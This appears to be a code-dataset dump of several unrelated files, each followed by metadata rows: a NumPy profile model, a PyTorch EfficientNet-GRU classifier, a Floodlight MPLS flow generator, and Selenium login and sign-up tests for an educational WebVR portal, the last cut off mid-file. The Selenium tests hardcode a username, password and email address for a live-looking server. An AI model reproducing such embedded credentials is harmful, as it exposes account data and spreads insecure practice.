x = x - self["mu"]
# The heart of the profile
y = np.arctan(x/self["scale"] + self["sig"]) + np.arctan(-x/self["scale"] + self["sig"])
# Make the highest point (actually most extreme point)
# equal to A
y *= (self["A"] / (2.*np.arctan(self["sig"])))
# Produce additional drop
difp = abs(self.inflectionPoints()[0] - self["mu"])
indi = np.where(np.abs(x) > difp)[0]
y[indi] *= np.exp(-np.abs(np.abs(x[indi])-difp)**2/self["tau"])
# Add offset and gradient
y += self["off"]
y += self["lin"] * (x + self["mu"])
return y
def inflectionPoints(self):
"""
Calculate the inflection points.
The inflection points of the profile depend on
both :math:`\sigma` and :math:`\mu`.
Returns
-------
Inflection points : tuple
Locations of the inflection points. Smaller one first.
"""
d = abs(self["scale"])/3.0 * \
np.sqrt(-3. + 3.*self["sig"]**2 + 6.*np.sqrt(self["sig"]**4 + self["sig"]**2 + 1.0))
return self["mu"]-d, self["mu"]+d | 33.927711 | 112 | 0.558416 | 778 | 5,632 | 4.012853 | 0.191517 | 0.048046 | 0.046124 | 0.016656 | 0.827675 | 0.817425 | 0.817425 | 0.817425 | 0.796925 | 0.772582 | 0 | 0.014866 | 0.283381 | 5,632 | 166 | 113 | 33.927711 | 0.758672 | 0.622869 | 0 | 0.705882 | 0 | 0 | 0.087786 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0 | 0.088235 | 0 | 0.441176 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eb4e1b88cc0ec4d984ae0e3187b049eec2c28c68 | 42 | py | Python | overpass/config/__init__.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | null | null | null | overpass/config/__init__.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | 1 | 2021-04-30T21:11:32.000Z | 2021-04-30T21:11:32.000Z | overpass/config/__init__.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | null | null | null | from overpass.config.config import CONFIG
| 21 | 41 | 0.857143 | 6 | 42 | 6 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 42 | 1 | 42 | 42 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
ebaa64afa1d1136b257fc3ce7454151878a46e8b | 3,991 | py | Python | pytorch-sandbox/model/model.py | doughtmw/surgeon-assist-net | 39fe619b18e888cc6395f8cd254060c169c9d3fd | [
"MIT"
] | 12 | 2021-07-15T09:52:11.000Z | 2022-02-22T06:35:11.000Z | pytorch-sandbox/model/model.py | doughtmw/surgeon-assist-net | 39fe619b18e888cc6395f8cd254060c169c9d3fd | [
"MIT"
] | null | null | null | pytorch-sandbox/model/model.py | doughtmw/surgeon-assist-net | 39fe619b18e888cc6395f8cd254060c169c9d3fd | [
"MIT"
] | null | null | null | import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
# Local imports
from utils.utils import count_parameters
def create_model(params):
feat_ext = str(params['feat_ext'])
if feat_ext == 'b0_lite':
print('Using effnet-lite b0 as feature extractor.')
return effnetb0_lite_rnn(params)
if feat_ext == 'b0':
print('Using effnet b0 as feature extractor.')
return effnetb0_rnn(params)
else:
print('No feature extraction backbone selected.')
return None
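# A minimal usage sketch (all parameter values below are hypothetical and
# should be adapted to the dataset at hand):
#   params = {
#       'feat_ext': 'b0_lite',      # or 'b0'
#       'img_size': (224, 224),     # (H, W) of each input frame
#       'seq_len': 8,               # frames per input sequence
#       'hidden_size': 128,         # GRU hidden units
#       'num_classes': 7,           # output classes
#   }
#   model = create_model(params)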
# EfficientNet-Lite-B0
class effnetb0_lite_rnn(torch.nn.Module):
def __init__(self, params):
super(effnetb0_lite_rnn, self).__init__()
self.img_size = params['img_size']
self.seq_len = params['seq_len']
self.hidden_size = params['hidden_size']
self.num_classes = params['num_classes']
# Feature extraction (no 1x1 conv layer, global pooling, dropout and fc head)
effnetb0 = torch.hub.load(
"rwightman/gen-efficientnet-pytorch",
"efficientnet_lite0",
pretrained=True,
exportable=True)
self.feat = torch.nn.Sequential(*list(effnetb0.children())[:-4])
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.rnn = nn.GRU(input_size=1280, hidden_size=self.hidden_size, num_layers=1, batch_first=True)
# Prediction structure
self.pred = nn.Sequential(
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(self.hidden_size, self.num_classes))
# Initialize rnn weights
init.xavier_normal_(self.rnn.all_weights[0][0])
init.xavier_normal_(self.rnn.all_weights[0][1])
print('count_parameters(self.feat):', count_parameters(self.feat))
print('count_parameters(self.rnn):', count_parameters(self.rnn))
print('count_parameters(self.pred):', count_parameters(self.pred))
def forward(self, x):
x = x.view(-1, 3, self.img_size[0], self.img_size[1])
x = self.feat.forward(x)
x = self.avgpool(x)
x = x.view(-1, self.seq_len, 1280)
self.rnn.flatten_parameters()
y, _ = self.rnn(x)
y = y.contiguous().view(-1, self.hidden_size)
y = self.pred(y)
return y
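# Shape flow in forward() above: input clips of shape (B, seq_len, 3, H, W)
# are flattened to (B*seq_len, 3, H, W) for the CNN backbone, pooled to 1280
# features per frame, regrouped to (B, seq_len, 1280) for the GRU, and the
# prediction head returns logits of shape (B*seq_len, num_classes).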
# EfficientNet-B0
class effnetb0_rnn(torch.nn.Module):
def __init__(self, params):
super(effnetb0_rnn, self).__init__()
self.img_size = params['img_size']
self.seq_len = params['seq_len']
self.hidden_size = params['hidden_size']
self.num_classes = params['num_classes']
# Feature extraction (no 1x1 conv layer, global pooling, dropout and fc head)
effnetb0 = torch.hub.load(
"rwightman/gen-efficientnet-pytorch",
"efficientnet_b0",
pretrained=True,
exportable=True)
self.feat = torch.nn.Sequential(*list(effnetb0.children())[:-4])
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.rnn = nn.GRU(input_size=1280, hidden_size=self.hidden_size, num_layers=1, batch_first=True)
# Prediction structure
self.pred = nn.Sequential(
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(self.hidden_size, self.num_classes))
# Initialize rnn weights
init.xavier_normal_(self.rnn.all_weights[0][0])
init.xavier_normal_(self.rnn.all_weights[0][1])
print('count_parameters(self.feat):', count_parameters(self.feat))
print('count_parameters(self.rnn):', count_parameters(self.rnn))
print('count_parameters(self.pred):', count_parameters(self.pred))
def forward(self, x):
x = x.view(-1, 3, self.img_size[0], self.img_size[1])
x = self.feat.forward(x)
x = self.avgpool(x)
x = x.view(-1, self.seq_len, 1280)
self.rnn.flatten_parameters()
y, _ = self.rnn(x)
y = y.contiguous().view(-1, self.hidden_size)
y = self.pred(y)
return y
| 34.405172 | 104 | 0.623152 | 526 | 3,991 | 4.538023 | 0.188213 | 0.041056 | 0.095517 | 0.060327 | 0.846251 | 0.846251 | 0.817763 | 0.817763 | 0.817763 | 0.817763 | 0 | 0.023364 | 0.249311 | 3,991 | 115 | 105 | 34.704348 | 0.773364 | 0.072663 | 0 | 0.738095 | 0 | 0 | 0.129268 | 0.063415 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059524 | false | 0 | 0.059524 | 0 | 0.202381 | 0.107143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
69682dfbbcf519a85c247b80a0eecdd640d15f61 | 1,830 | py | Python | Network2/projects/project 3/test.py | mheidari98/_IUT | f684d31071512edeefe8c8405746d4f3eab6ab6b | [
"MIT"
] | 1 | 2021-07-10T19:52:38.000Z | 2021-07-10T19:52:38.000Z | Network2/projects/project 3/test.py | mheidari98/_IUT | f684d31071512edeefe8c8405746d4f3eab6ab6b | [
"MIT"
] | null | null | null | Network2/projects/project 3/test.py | mheidari98/_IUT | f684d31071512edeefe8c8405746d4f3eab6ab6b | [
"MIT"
] | null | null | null | #!/usr/bin/python3
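# Generates Floodlight Static Flow Pusher entries for n (src, dst, mid)
# switch triples: flows that push an MPLS label at the ingress switch
# (primary path for ip_tos 1, backup path through mid for ip_tos 2),
# swap the label at the middle switch, and pop it at the egress switch,
# then prints a matching pusher.set(...) call for every flow.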
n=3
k=1
for i in range(1,(n*3+1),3):
src = i
dst = i+1
mid = i+2
x1 = f"""flow{k} = {{
'switch':"00:00:00:00:00:00:00:0{src}",
"name":"flow_mod_{k}",
"eth_type":"0x0800",
"ipv4_src":"10.0.0.0{src}",
"ipv4_dst":"10.0.0.0{dst}",
"priority":"32768",
"in_port":"1",
"ip_tos":"1",
"active":"true",
"actions":"push_mpls=0x8847,set_field=mpls_label->{k},output={dst}"
}}"""
k+=1
x2 = f"""flow{k} = {{
'switch':"00:00:00:00:00:00:00:0{src}",
"name":"flow_mod_{k}",
"eth_type":"0x0800",
"ipv4_src":"10.0.0.0{src}",
"ipv4_dst":"10.0.0.0{dst}",
"priority":"32768",
"in_port":"1",
"ip_tos":"2",
"active":"true",
"actions":"push_mpls=0x8847,set_field=mpls_label->{k},output={mid}"
}}"""
k+=1
x3 = f"""flow{k} = {{
'switch':"00:00:00:00:00:00:00:0{mid}",
"name":"flow_mod_{k}",
"eth_type":"0x8847",
"priority":"32768",
"in_port":"{dst}",
"mpls_label":"{k-1}",
"active":"true",
"actions":"set_field=mpls_label->{k},output={mid}"
}}"""
k+=1
x4 = f"""flow{k} = {{
'switch':"00:00:00:00:00:00:00:0{dst}",
"name":"flow_mod_{k}",
"eth_type":"0x8847",
"priority":"32768",
"in_port":"{dst}",
"mpls_label":"{k-3}",
"active":"true",
"actions":"pop_mpls=0x0800,output=1"
}}"""
k+=1
x5 = f"""flow{k} = {{
'switch':"00:00:00:00:00:00:00:0{dst}",
"name":"flow_mod_{k}",
"eth_type":"0x8847",
"priority":"32768",
"in_port":"{mid}",
"mpls_label":"{k-2}",
"active":"true",
"actions":"pop_mpls=0x0800,output=1"
}}"""
k+=1
print(x1)
print(x2)
print(x3)
print(x4)
print(x5)
for i in range(1, 5*n+1):
print(f"pusher.set(flow{i})")
| 18.673469 | 71 | 0.489617 | 286 | 1,830 | 2.996504 | 0.178322 | 0.140023 | 0.175029 | 0.186698 | 0.829638 | 0.801634 | 0.801634 | 0.801634 | 0.801634 | 0.76196 | 0 | 0.145597 | 0.230601 | 1,830 | 97 | 72 | 18.865979 | 0.463068 | 0.00929 | 0 | 0.611111 | 0 | 0.069444 | 0.817329 | 0.403974 | 0 | 0 | 0.029801 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
15c9e0a047527ebc9f1794efdb58543500fbb211 | 24,644 | py | Python | unittests/vaeative_unit.py | keshav154/VeativeWebVR | ff60cb0fcd1ace41ce4914904f89a5367dbba93e | [
"MIT"
] | null | null | null | unittests/vaeative_unit.py | keshav154/VeativeWebVR | ff60cb0fcd1ace41ce4914904f89a5367dbba93e | [
"MIT"
] | null | null | null | unittests/vaeative_unit.py | keshav154/VeativeWebVR | ff60cb0fcd1ace41ce4914904f89a5367dbba93e | [
"MIT"
] | 5 | 2019-08-19T00:52:18.000Z | 2020-03-04T10:11:33.000Z | import unittest
from selenium import webdriver
from selenium.webdriver.support.select import Select
import HtmlTestRunner
from selenium.webdriver.support.ui import WebDriverWait
from time import sleep
import xmlrunner
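# End-to-end Selenium checks for the Unicef portal and the WebVR lesson
# modules: login/sign-up form validation, one launch test per Aframe module,
# and the impact-analysis report pages. Every test starts its own Chrome
# session via a local chromedriver binary.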
class Test(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
cls.driver.get('file:///D:/Santhosh/VeativeWebVR/Structure_of_Phenol/login.html')
cls.driver.implicitly_wait(10)
def test_login_form_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
print("logged in successfully")
return 0
def test_signup_tag_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginbtn = '//a[contains(text(),\'Login\')]'
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
return 0
def test_signup_form_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginbtn = '//a[contains(text(),\'Login\')]'
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
signupurl = '//a[contains(text(),\'Sign Up\')]'
full_name = '//input[@id=\'FULL_NAME\']'
email_id = '//input[@id=\'EMAIL_ID\']'
username = '//input[@id=\'USER_NAME\']'
passwd = '//input[@id=\'USER_PASSWORD\']'
age = '//input[@id=\'USER_AGE\']'
gender = '//select[@id=\'USER_GENDER\']'
signup_btn = '//input[@id=\'userSignUpFrm-btn\']'
captura = '//img[@id=\'captcha-image\']'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(signupurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(full_name))
user_element.send_keys("sanjeev amar")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(email_id))
passwd_element.send_keys("sanjeev.amar@gmail.com")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
btn_element.send_keys("amarnath123")
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
loginelement.send_keys("sanjeev123")
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(age))
user_element.send_keys("24")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(gender))
passwd_element.send_keys("male")
sign_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(signup_btn))
sign_element.click()
print("signed up successfully")
return 0
def test_componet_lineandplain_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ms300035/')
self.driver.implicitly_wait(20)
return 0
def test_componet_structurePhonel_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ss200049/')
self.driver.implicitly_wait(20)
return 0
def test_componet_complexNumbers_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs300012/')
self.driver.implicitly_wait(20)
return 0
def test_componet_Reproduct_part_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ms100027/')
self.driver.implicitly_wait(20)
return 0
def test_componet_OpaqueT_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs400052/')
self.driver.implicitly_wait(20)
return 0
def test_componet_series_parallel_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs400034/')
self.driver.implicitly_wait(20)
return 0
def test_componet_atomic_model_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs200040/')
self.driver.implicitly_wait(20)
return 0
def test_componet_Galv_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs400060/')
self.driver.implicitly_wait(20)
return 0
def test_componet_Dominent_recessive_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ms100176/')
self.driver.implicitly_wait(20)
return 0
def test_componet_lines_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ms300045/')
self.driver.implicitly_wait(20)
return 0
def test_componet_dot_structure_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs200069/')
self.driver.implicitly_wait(20)
return 0
def test_componet_Humun_brain_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
